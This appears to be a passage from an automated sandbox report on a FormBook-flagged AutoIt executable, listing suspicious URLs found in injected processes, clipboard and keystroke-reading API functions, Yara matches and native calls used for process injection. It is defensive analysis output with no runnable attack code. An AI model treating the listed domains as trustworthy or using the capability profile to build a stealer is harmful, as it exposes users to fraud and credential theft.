Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://thjpg2.top/upload/vod/20250305-1/e32003fe5f305658c481afc8aad4ceb2.jpg
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://thz.wcsp8.motorcycles/cn/home/web/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://top.j8yy7.boats/cn/home/web/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://uqetyzxa.com/20250304/7WgCphVR/1.jpg
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://uqetyzxa.com/20250304/srwvEWMO/1.jpg
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://uwb.zykdh3.cyou/zykdh/just/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://vhr.hxav4.online/cn/home/web/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://wpm.mjw7.monster/cn/home/web/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.avdazhan.com/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.avnyg.com/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.dongche1.com/
Source: rasdial.exe, 00000004.00000003.2352555602.0000000007DAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: rasdial.exe, 00000004.00000003.2352555602.0000000007DAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.lkhsp.com/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.nzxsp.com/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.qqqabc.com/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.slszx.com/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.xzylm.com
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.yhdd9.com/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://xbzyw5.top/video/m3u8/2025/02/27/79324_cover_2025-02-27_033015.jpg
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://xbzyw5.top/video/m3u8/2025/02/27/82568_cover_2025-02-27_210145.jpg
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://xbzyw5.top/video/m3u8/2025/02/28/10934_cover_2025-02-28_230103.jpg
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://xbzyw5.top/video/m3u8/2025/02/28/92575_cover_2025-02-28_225832.jpg
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://xim.lgcq4.one/cn/home/web/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://xyu.qsyjd5.cyou/cn/home/web/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://y-234.3y4ej8.com?shareName=388x218
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://yby.nemfav6.life/cn/home/web/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://yll.sdw6.fit/sdw/my/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://yng.ywnv2.online/cn/home/web/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://ypn.ywsn9.website/cn/home/web/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://yps.bjnyh7.world/cn/home/web/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://z0520-mkl.26503.shop?channelCode=shiping009
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://zgj.yzzt4.beauty/cn/home/web/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://zic.mhg7.work/cn/home/web/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://zjk.seyan4.monster/cn/home/web/
Source: rasdial.exe, 00000004.00000002.4530749885.0000000005B4C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000004.00000002.4532965414.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.0000000003B0C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://zyzf2dimage.ck3ksmw.com/uploads/images/movies/2025-03-05/1741140082313.jpeg

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_001A4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_001A4164

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_001A4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_001A4164

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_001A3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_001A3F66

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_0019001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0019001C

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_001BCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_001BCABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4529137724.0000000000F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2175914455.00000000080D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4529171574.0000000000F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4531314792.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4527985230.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2171988415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4529216494.0000000003A10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2172584139.00000000041E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00133B3A
Source: rPO-20429124.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: rPO-20429124.exe, 00000000.00000002.2069159522.00000000001E4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8d8d0cff-3
Source: rPO-20429124.exe, 00000000.00000002.2069159522.00000000001E4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_b0d57c23-2
Source: rPO-20429124.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_70325c69-5
Source: rPO-20429124.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_c828b731-5

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C873 NtClose,	2_2_0042C873
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472B60 NtClose,LdrInitializeThunk,	2_2_03472B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03472DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03472C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,	2_2_034735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03474340 NtSetContextThread,	2_2_03474340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03474650 NtSuspendThread,	2_2_03474650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BE0 NtQueryValueKey,	2_2_03472BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BF0 NtAllocateVirtualMemory,	2_2_03472BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472B80 NtQueryInformationFile,	2_2_03472B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BA0 NtEnumerateValueKey,	2_2_03472BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AD0 NtReadFile,	2_2_03472AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AF0 NtWriteFile,	2_2_03472AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AB0 NtWaitForSingleObject,	2_2_03472AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F60 NtCreateProcessEx,	2_2_03472F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F30 NtCreateSection,	2_2_03472F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FE0 NtCreateFile,	2_2_03472FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F90 NtProtectVirtualMemory,	2_2_03472F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FA0 NtQuerySection,	2_2_03472FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FB0 NtResumeThread,	2_2_03472FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472E30 NtWriteVirtualMemory,	2_2_03472E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472EE0 NtQueueApcThread,	2_2_03472EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472E80 NtReadVirtualMemory,	2_2_03472E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472EA0 NtAdjustPrivilegesToken,	2_2_03472EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D00 NtSetInformationFile,	2_2_03472D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D10 NtMapViewOfSection,	2_2_03472D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D30 NtUnmapViewOfSection,	2_2_03472D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DD0 NtDelayExecution,	2_2_03472DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DB0 NtEnumerateKey,	2_2_03472DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C60 NtCreateKey,	2_2_03472C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C00 NtQueryInformationProcess,	2_2_03472C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CC0 NtQueryVirtualMemory,	2_2_03472CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CF0 NtOpenProcess,	2_2_03472CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CA0 NtQueryInformationToken,	2_2_03472CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473010 NtOpenDirectoryObject,	2_2_03473010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473090 NtSetValueKey,	2_2_03473090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034739B0 NtGetContextThread,	2_2_034739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473D70 NtOpenThread,	2_2_03473D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473D10 NtOpenProcessToken,	2_2_03473D10
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B64650 NtSuspendThread,LdrInitializeThunk,	4_2_04B64650
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B64340 NtSetContextThread,LdrInitializeThunk,	4_2_04B64340
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_04B62CA0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_04B62C70
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62C60 NtCreateKey,LdrInitializeThunk,	4_2_04B62C60
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_04B62DF0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62DD0 NtDelayExecution,LdrInitializeThunk,	4_2_04B62DD0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_04B62D30
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_04B62D10
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_04B62E80
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_04B62EE0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62FB0 NtResumeThread,LdrInitializeThunk,	4_2_04B62FB0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62FE0 NtCreateFile,LdrInitializeThunk,	4_2_04B62FE0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62F30 NtCreateSection,LdrInitializeThunk,	4_2_04B62F30
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62AF0 NtWriteFile,LdrInitializeThunk,	4_2_04B62AF0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62AD0 NtReadFile,LdrInitializeThunk,	4_2_04B62AD0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_04B62BA0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_04B62BF0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_04B62BE0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62B60 NtClose,LdrInitializeThunk,	4_2_04B62B60
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B635C0 NtCreateMutant,LdrInitializeThunk,	4_2_04B635C0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B639B0 NtGetContextThread,LdrInitializeThunk,	4_2_04B639B0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62CF0 NtOpenProcess,	4_2_04B62CF0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62CC0 NtQueryVirtualMemory,	4_2_04B62CC0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62C00 NtQueryInformationProcess,	4_2_04B62C00
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62DB0 NtEnumerateKey,	4_2_04B62DB0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62D00 NtSetInformationFile,	4_2_04B62D00
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62EA0 NtAdjustPrivilegesToken,	4_2_04B62EA0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62E30 NtWriteVirtualMemory,	4_2_04B62E30
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62FA0 NtQuerySection,	4_2_04B62FA0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62F90 NtProtectVirtualMemory,	4_2_04B62F90
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62F60 NtCreateProcessEx,	4_2_04B62F60
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62AB0 NtWaitForSingleObject,	4_2_04B62AB0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B62B80 NtQueryInformationFile,	4_2_04B62B80
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B63090 NtSetValueKey,	4_2_04B63090
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B63010 NtOpenDirectoryObject,	4_2_04B63010
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B63D10 NtOpenProcessToken,	4_2_04B63D10
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B63D70 NtOpenThread,	4_2_04B63D70
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A59320 NtCreateFile,	4_2_00A59320
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A59490 NtReadFile,	4_2_00A59490
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A59590 NtDeleteFile,	4_2_00A59590
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A59640 NtClose,	4_2_00A59640
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A597A0 NtAllocateVirtualMemory,	4_2_00A597A0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_0483F73F NtMapViewOfSection,	4_2_0483F73F
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_0483F023 NtQueryInformationProcess,	4_2_0483F023

